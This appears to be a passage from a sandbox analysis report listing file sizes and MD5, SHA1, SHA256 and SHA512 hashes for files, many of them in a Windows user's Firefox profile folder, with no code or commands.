SHA256aa7105a237dc64c8eb179f18d54641e5d7b9ab7da7bf71709a0d773f20154778
SHA5126192d61e777c59aa80c236b2f3e961795b7ff9971327c4e3270803d356ecf38949811df680a372259a9638ccdb90fc1271fb844f1f35656d5b317c96081f396e
-
Filesize
354KB
MD527f0df9e1937b002dbd367826c7cfeaf
SHA17d66f804665b531746d1a94314b8f78343e3eb4f
SHA256aff35e23562fc36f4b8f6b5bf95eb5dbf11e8af6674e3212aa0c4077ddfe8209
SHA512ee4e7e5a8ffe193a8487dd4e9bfb13affa74cacdf250a4e22ed0fc653bbfb615855771dd41d295be905bed311c1690874ce61a5a9d9a5745b4bc550715c7de17
-
Filesize
1.2MB
MD5bf6f64455cb1039947a3100e62f96a52
SHA128cdd5c2e82d4ad078420dcbf4b32b928861fcb6
SHA256c81ece0b60ed50db7d3769388f34ba051a05c95bd026e78dabb6ce08ff91bbba
SHA512c2ceb000b387710cf388e6699a2cb4465380bf5798d9f37c238db0701aaea6ccad1f44e6b9e45398050202ef875a5d7679890df2bb65538a0c8a9655c62c185b
-
Filesize
8KB
MD53a8cdb935644114aff2a0bb2c0311da4
SHA162ad34a348327f32f3a071a971571d3d1cf48a64
SHA256e0cc88420a840922f66d32575f903f67fd26565d01b42883948a56f868f0deef
SHA51211996dca961fd50c4633fe562981128f83faf706ac5c272203aa2d9c53238be5fb5364598580206a49795ad74ee219390367205376925819bcdbbdd485c1dc4a
-
Filesize
30KB
MD5557f6e225bfd752bb1ec890df939ed7e
SHA144d36fc36670c6fd7325eb0223670f084488ebef
SHA256ceb1882ccbc540db0922debb1bec4a399cf9968b4f4275b687bbcfb3497fe4e6
SHA512c0040761560139569e6b8520b32a322b0fe5a7607361f18042097ca685027dd042ac912c3ca70227f78e1156eb9798cbb5b256228679f7c7414e1a5f648c0516
-
Filesize
40KB
MD5ab893875d697a3145af5eed5309bee26
SHA1c90116149196cbf74ffb453ecb3b12945372ebfa
SHA25602b1c2234680617802901a77eae606ad02e4ddb4282ccbc60061eac5b2d90bba
SHA5126b65c0a1956ce18df2d271205f53274d2905c803d059a0801bf8331ccaa28a1d4842d3585dd9c2b01502a4be6664bde2e965b15fcfec981e85eed37c595cd6bc
-
Filesize
1KB
MD5bb9176351d483aa3c7a673f33181cd41
SHA139b3691dfafd0434376de4a2068e2761f5c2950b
SHA25658ef2a082c4785eaa90a5bcafc9682c2848b07e21833c01aa0e52cd2be66c334
SHA51262befa29cf696b9527c7fa669bf860272beed68a94c35e38d469f8bc0ac698b1c43cf7c475a444859e5e1ce7327f3cb6f34ab0679f68fac106cbc2c0c1dc9be0
-
Filesize
1KB
MD56aae53aaa7b726586633e6c829d76c0e
SHA1e0bcac0e0065d97650fc86cdd64604a3a4ced191
SHA2569a1cc10b9a38dd4b86ceaf2faa0cdd1ad25f9a5833fb31589431e693c4879553
SHA5120ce945a72521c6106467597ae3afbd5397946047a2ba0ee2e89b08da38c2c4f6b5e8676565adaa1ca75333849b5fe8f709fb2c7969880d820e8664bbd1488f84
-
Filesize
717B
MD5d4f6ad56a812685e1e7984532d74e5a3
SHA10dcebca5e19603a571692edd80fca141540779bf
SHA256e2f7b8bd07a25802c73d24f4924a1242315a2ddf9400592b42daeb98edfc1618
SHA51226c91a945c3966d829a9edbffeb4d8e395dec094db8564a9c6ee5a5370dbb695a3a02b4b7f2e677fef16d3a1f54062a8c5eba92970cc989fef85818e0d61b3ec
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
8KB
MD509efd35074ce43dfa80a5b4d303df55b
SHA1a9996c42ea607bb9c128b3ec6e6edaf491a9a689
SHA2561c7b23c77143aad14d916f810ac1bd4fe6aff14df77e3df21ea005c1cbb5c809
SHA512bd7c8e1642489755d1f9eb18b264046a619f1e38adf08f1ffa53e1014141d0afc8a28811677104340f29c7a800f38f0e5fca1330f5e77f64eaf3506f0c41e76f
-
Filesize
14.0MB
MD5bcceccab13375513a6e8ab48e7b63496
SHA163d8a68cf562424d3fc3be1297d83f8247e24142
SHA256a6af95a209b2e652ed6766804b9b8ad6b6a68f2c610b8f14713cd40df0d62bf9
SHA512d94483deaae98bf9212699f1ab0bd913f6151a63e65ebc1ea644ab98d5e3ebd74ecaa08f70aca31e11a5d2c64d1504b723817af35bbe9d7b05c758dd6945d484
-
Filesize
11KB
MD525e8156b7f7ca8dad999ee2b93a32b71
SHA1db587e9e9559b433cee57435cb97a83963659430
SHA256ddf3ba4e25a622276755133e0cce5605b83719c7cab3546e09acbfed00d6a986
SHA5121211b2fa997ba13ff926aec58b6b35a81d7fe108b0caa8f4d6369d0a37f8481373b78a4b201651243adde9e2b2699ce929482a46226ff6299b0a0e40fe2ddc56
-
Filesize
502KB
MD5e690f995973164fe425f76589b1be2d9
SHA1e947c4dad203aab37a003194dddc7980c74fa712
SHA25687862f4bc8559fbe578389a9501dc01c4c585edb4bb03b238493327296d60171
SHA51277991110c1d195616e936d27151d02e4d957be6c20a4f3b3511567868b5ddffc6abbfdc668d17672f5d681f12b20237c7905f9b0daaa6d71dcdac4b38f2448b2
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\iauxn5db.default-release\AlternateServices.bin
Filesize8KB
MD5ccc0052404307f9fad3cefe94730b1bc
SHA1ce305df7b45a43fc6946b43a3d2bd7f727c42105
SHA25685751e77df6abefefd25c7b18b3a43f2a1fa56ba047ced2369fbf15aec441b1c
SHA5129ff31612625cb8222a2b15c396c557e94a84723efac6f780277b24d32f251230f28e4e7334c2401aad8229c1f1c82969ee55036869b67ca207208b60ab72fda4
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\iauxn5db.default-release\AlternateServices.bin
Filesize17KB
MD5ae7412df40166bbb4a9988734f429003
SHA15c0291a2f74fe6e5c81d09a27d1cce389973c839
SHA25691e155a68b0bb5ce24f9676a583bc6f14e26e3cba83458c28c4133ff7b1bf221
SHA512a473eb1ac2f490c19dbf6d0fd967b276c431410bf6701059ee146b578b2aedc379bda14306384de911f2b6edc52b25ce16d1bfde5550c18a4b7eb0df21009a49
-
Filesize
224KB
MD55f26629e878be06bc2cd80dedf7c2934
SHA16b930aa29cfdff745c832d381c676c26f85e70f1
SHA25689ca2b2ab1fc95def6ee990b71db27ddc233f1042107645d8511b4c5dc55f16d
SHA5120a166c3a2d9a32c9d94f0d6c5155ba4b9e5dfdd62b180a40ed1b4d6b01b4ad5c00443d1cfa70d04ad5ea830e10e0451c624c1adc3cc0b7c237aadc09a657c9dd
-
Filesize
198B
MD5ce9ef13caa8a74c25157b184aa038475
SHA1db03a9935d8bb3ce6b120aca98feade536805160
SHA256252b7fff962848c61092e82a3d87adca163849767713a93ab533bb397f1f53bb
SHA5120f6f5053e78167ef5cc5fa70ed3a87dd116df0671a590299277a197341bed983e3d77e37ad2c33cd4afe880fab9ed1c7f7502210040617a01f97a81c1e1d4f29
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\iauxn5db.default-release\datareporting\glean\db\data.safe.tmp
Filesize6KB
MD56d4c55afd3d7c6bd48a663eae1f847f9
SHA1b9d107c244cb7544560e20543f8100afde1741ea
SHA256c3a6103ca9fcf10df36da6053df075a22d92edebf78ff7372dd765ccc2bc88d0
SHA512e4312d239d84590da89172aa5dc1b47eae1f2490c2f53027ac04b42d0ded89c595fd3daecb1e4a5fa9ad8f14b49dc66e20ba7fb75414a4a80da2823577b950e4
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\iauxn5db.default-release\datareporting\glean\events\events
Filesize1KB
MD5615445e74288b0a7ddd281830f5d48a3
SHA1af678d6bc4def27d71000c406484898fc80167b6
SHA2568a70471c8bc38790bdbeaf3c79b451f11af0289282abe61322d381681b671b6d
SHA51226bebd62a360940ee5cc8d6ea34e8377f8e566fef875660eb78ded49d6897c00e88c73578d0779fa87cb520d16263a143a9d29b3d2032520e201bfb3dff594c8
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\iauxn5db.default-release\datareporting\glean\pending_pings\45f3b49d-7c18-40b8-b620-5d53bd346ddb
Filesize16KB
MD59a63711c34a631fb6bd78b55e53771b0
SHA1c8857994416c0229555b890af664e9245e0e320f
SHA25691bdc341ef1e7abe3315c80343d4716ea96c914929837d1336d81973fa5c47a6
SHA5129071a559d4f1477cd2d9677e99f23f79e8e799dbf1fc452d9604f1d3612c872e932f552de39dd46e03a84d6e4ba1139040c681786502416f51e30255908c19fb
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\iauxn5db.default-release\datareporting\glean\pending_pings\477709b5-20af-4af9-8627-9e41a89566cf
Filesize235B
MD51ce6d38af91cb96387edbadf037b06b3
SHA170075417fa6e2ee97eb55f9e08d4c5ef294024c5
SHA256bc5ca0ded2fe0de153ad6a8809d9f45db4573e9dcbfec530629243369f4720ba
SHA512bbfc1f1b32eafcf43136b48b40caefa5f6f1e4cf992a7e3353f1f10dc7b3398944c6979e1f02f04d2d5055e9959c6459a3119c78c6695150e66b69ca9cdb179c
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\iauxn5db.default-release\datareporting\glean\pending_pings\77391c01-ecd7-475f-8cab-ac42ec9b90fb
Filesize235B
MD5b639aed23b046e24cc4e1c519d6e9e2c
SHA1ed36d1a4421846a1e3d67deff847e7c2b0e7cfdc
SHA256e5fc2b64c95058b7622e72048aed42687a2c92589bbec087f3d96f4a5ab85278
SHA512c773014978ad626e055727a58e082c4116184e02d059fd21f2085caeddd352b5927183f73f4072619c9b3ea81cd9bc07679b2cbfa661cd9fb1ee74c3e593e8ec
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\iauxn5db.default-release\datareporting\glean\pending_pings\ef6e62e8-5149-403b-9db5-3ed12f7459ea
Filesize886B
MD55e8c43f00e03e49d03bed1e6da3cbb66
SHA1c3550d8aa24e7c4cc8a1dbce8c26b45b7e7da6d4
SHA25653655d6cd56f90d5dcf7f1742890bd0928cad521824cb5a71744dca67d5fa66c
SHA51215da0c452040aabffb59680f4574d9bcf96f866548d20466f899ea94fde7330cc0f48b6a1541241061ff7b93b71ed1a9a363127caa062ff2f9bb0e3ff296a560
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\iauxn5db.default-release\datareporting\glean\pending_pings\f2f46150-212f-4db5-83a2-15e44658b6e5
Filesize883B
MD5ed49958d8f4a221be6764ab6f1deed71
SHA15a29bce7f389f5d8266442c1248830923b9c813f
SHA2568531e116725334942894724d677021b274ba2cab1f90ff92b82c0507a3745b14
SHA512f9bee6280581186cd37eaecbeb2ec51ec571fdce6a3be37a17f5ec5dd94f190b2e5f33f72aa98f97fadbbc8fcc7135db8457f6f6a06103f98e7fbf9e7114cb20
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\iauxn5db.default-release\datareporting\glean\pending_pings\f88dc1e0-8614-4639-b348-f8c8c9714450
Filesize2KB
MD51efafacb551c1519049c2faf75618cb5
SHA1996520e9dde2cb610dc2e1cc15a1c3e1c01498b1
SHA256c413f3a4b9798ecdea464b346ce594ab73feacb0c3d53d676388a6368ef155f0
SHA512cb0209b3bdd0738784e1f3546762e9145a48c5aafd08fdbb929e57945c3578e1aedd4ee4d1fbec077ad42ee50302a2dae2c096d014356f361331c1e03da9ae35
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\iauxn5db.default-release\gmp-gmpopenh264\2.6.0\gmpopenh264.dll
Filesize1.1MB
MD5626073e8dcf656ac4130e3283c51cbba
SHA17e3197e5792e34a67bfef9727ce1dd7dc151284c
SHA25637c005a7789747b412d6c0a6a4c30d15732da3d857b4f94b744be1a67231b651
SHA512eebdeef5e47aeadfeebdbab8625f4ec91e15c4c4e4db4be91ea41be4a3da1e1afeed305f6470e5d6b2a31c41cbfb5548b35a15fccd7896d3fde7cdf402d7a339
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\iauxn5db.default-release\gmp-gmpopenh264\2.6.0\gmpopenh264.info
Filesize116B
MD5ae29912407dfadf0d683982d4fb57293
SHA10542053f5a6ce07dc206f69230109be4a5e25775
SHA256fe7686a6281f0ab519c32c788ce0da0d01640425018dcffcfcb81105757f6fe6
SHA5126f9083152c02f93a900cb69b1ce879e0c0d69453f1046280ca549a0301ae7925facdda6329f7ccb61726addee78ba2fffc5ba3491a185f139f3155716caf0a8d
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\iauxn5db.default-release\gmp-widevinecdm\4.10.2891.0\manifest.json
Filesize1001B
MD532aeacedce82bafbcba8d1ade9e88d5a
SHA1a9b4858d2ae0b6595705634fd024f7e076426a24
SHA2564ed3c6389f6f7cd94db5cd0f870c34a296fc0de3b1e707fccf01645b455790ce
SHA51267dfe5632188714ec87f3c79dbe217a0ae4dfb784f3fac63affd20fef8b8ef1978c28b3bf7955f3daaf3004ac5316b1ffa964683b0676841bab4274c325c6e2b
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\iauxn5db.default-release\gmp-widevinecdm\4.10.2891.0\widevinecdm.dll
Filesize18.5MB
MD51b32d1ec35a7ead1671efc0782b7edf0
SHA18e3274b9f2938ff2252ed74779dd6322c601a0c8
SHA2563ed0dec36754402707c2ae4fbfa887fe3089945f6f7c1a8a3e6c1e64ad1c2648
SHA512ab452caa2a529b5bf3874c291f1ffb2a30d9ea43dae5df6a6995dde4bc3506648c749317f0d8e94c31214e62f18f855d933b6d0b6b44634b01e058d3c5fcb499
-
Filesize
8KB
MD5b7c77fb6fbdbc1abfccb73dbe6c0e5bb
SHA17b2faff9c835b5c62fb44c660d21fdf20dd34d99
SHA2560bd65a54e225606c67c293e90624a7b7c467dcd9996411a1986f8652086b87d4
SHA51233005e052e5d10dd82d72f9b47c229246f5a92f8e6e5943ed959eaa606b02de648e718d70f3a4ea4cc9eb666b602f3c30349b833b590d4d633b62e516c6c7fae
-
Filesize
6KB
MD5b38ed70ce6c4c2e31633139f37fb5eee
SHA15a2bc42ea9bfae49242f6377f8400e4d57ca5191
SHA256c1cfe94e2835e51dcfed4739f81829b9bb7e6265bcc44000962d44cb4750a8bc
SHA5126012369c911faca55507f6d14b43a0cc90a75cc158ce1d097dfbc147faf1a46fb3a717ecbbae7383ef02232036c8e2d39386a17f57b932b0b8cee2446fba14c7
-
Filesize
11KB
MD536054e5e4069e992f2a8a6a4e60d0a0f
SHA1a314fc79331c406cb72eb6c3a494ab90166a6ba4
SHA2560a885590dca722d7dc628c45f6f8cf9fa5653810c8fad7746e05cd25d46ec7e1
SHA512e3bbfbbd137547e620ca1c3f99970fc446640facd482e5dc21233a77c5ec457706ef0f4660077b942c26955ec336c054f25d452dc6b560dc4500375843e82544
-
Filesize
6KB
MD5bcbfc8fc87dd2bec8f63079ee3a45a3a
SHA141cde21e19d030c80d815c86b4343f1b65de2fe8
SHA256ae9e3092611d9a4dc58168a2dba4d6f9005baf8696f446dd1a7a653bf3baf312
SHA51225ba9b29510edf511515f635514e3b8ca4c18b2e1a6eab9f6d027a748baa014314b526d33c5fb81ffa5b11d8666865d11d5992b58f4a0086e4bf02e4b36066a9
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\iauxn5db.default-release\sessionstore-backups\recovery.baklz4
Filesize1KB
MD5a15a264c97c673115bf7df07257b1daa
SHA184129d43d65b54486517609f81708ca65cb6fc0d
SHA256fc3a117b77f8a31b3938dfe66a44b736e8f38f2d4a2d63f4c59c0a4b2396485d
SHA5126421a47b19aad834704fe2fc2b4ec310b7fe54052fd0d126547df23bad56a7d360fd60ff25b66a3f158089a12929d00b80910a515c422c487b14c0457d5e5071
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\iauxn5db.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
Filesize3.3MB
MD591a91f77ff143c6c44a11d3270403598
SHA13021ce90ef55323348c3d7a0ba63c8c1fe9bd283
SHA2567a481eccab7ade84934755bf3c1259160c67146d8cd97bcac1354ebc43f7b7a6
SHA5123215431a21fcccdc2cba10ab26094263b29e0b844aa9cdd2733225fba9942a46db68c77c0d0d089040c588a93c82d073fb08d86805bec552f5ed3070a4255ca4
-
Filesize
204B
MD5b6861ea47060d8e0aa461a9b981c9642
SHA1ebcead6390d1d0962f46920369442c673b483e3f
SHA2563af24fb2ec98c6d572f3ab741cbeb1a0c0a57dfcfc88b98fb31031b91ea835b4
SHA512c37cea920cd61e2fa5ce1b1e3d59bf6d090aaa4d996b16feb1d46e67f69e1bde4f8d899a512aaaa60cda7cabe03c0466578735bb2e572c1a16412653f89c1fec
-
Filesize
652B
MD578f58f490975addd79364a167addd7a7
SHA1820ef9712d23b6dd0e42790e2b173824ae82a87e
SHA256b894942422a9217ab7ea8fc8c1c7e5835cc55cd335642eb503de6b913800dbd2
SHA5125d5688199bdab9743515ca7bdfb55f3c6e8f5b6a0615d3fb45c4b90b141273cfefc3ee11c68ccae09d0294eb7d9c07d5d3219f43b6229372ace73cb249924e44
-
Filesize
652B
MD5d5d94b186406841f3cb1f93876c23b9d
SHA1727846288616ca63c323b59b56a907abb04c91df
SHA256e9cdb5964722a948450b69191411955b21e1de287c735cc7c0194b284f33de30
SHA5129d7881ba3d407925f812e43d539199bf6b95bc8c5aae6368e44154aa215dd1f150f2daee1ab3b86f6c448d7252dc761e925fc40abe175b21946cf6dedc84bba9
-
Filesize
8KB
MD558b10ef6ba0da88788f1aac56ce7e2db
SHA148221936b98aac14ead7c4589513d074365414ec
SHA256ae11144f426028e50e77d64a66aeb954e169f627f8abfe403791032594834520
SHA51219c28b5af8e4243350ee13c423fd066cef969a5c86de5f7b2ac4e4fbf75fda17e82a6a91fbd6034786b9beee77e2eb4b1cecd1cf0b901e2874b88da3e338845e
-
Filesize
204B
MD5a1c7a7a1d98a7c9550f11c4c0e523fa1
SHA1a1695fbac5df4671e47ed1bde4f9383c9fdc4b29
SHA2568db3bbe27a5664d0be9d2fcb9e809b4e3ab8073bac80307ba01aca362e720012
SHA512210a12f7ee348fd714b233fc332497c1e3001892f82da9d4b2ed0a69c68d2a95b3c9cb2a61f18ab65ebe0cb5367d84c356a44a27a3eae878fdd8fd009df58933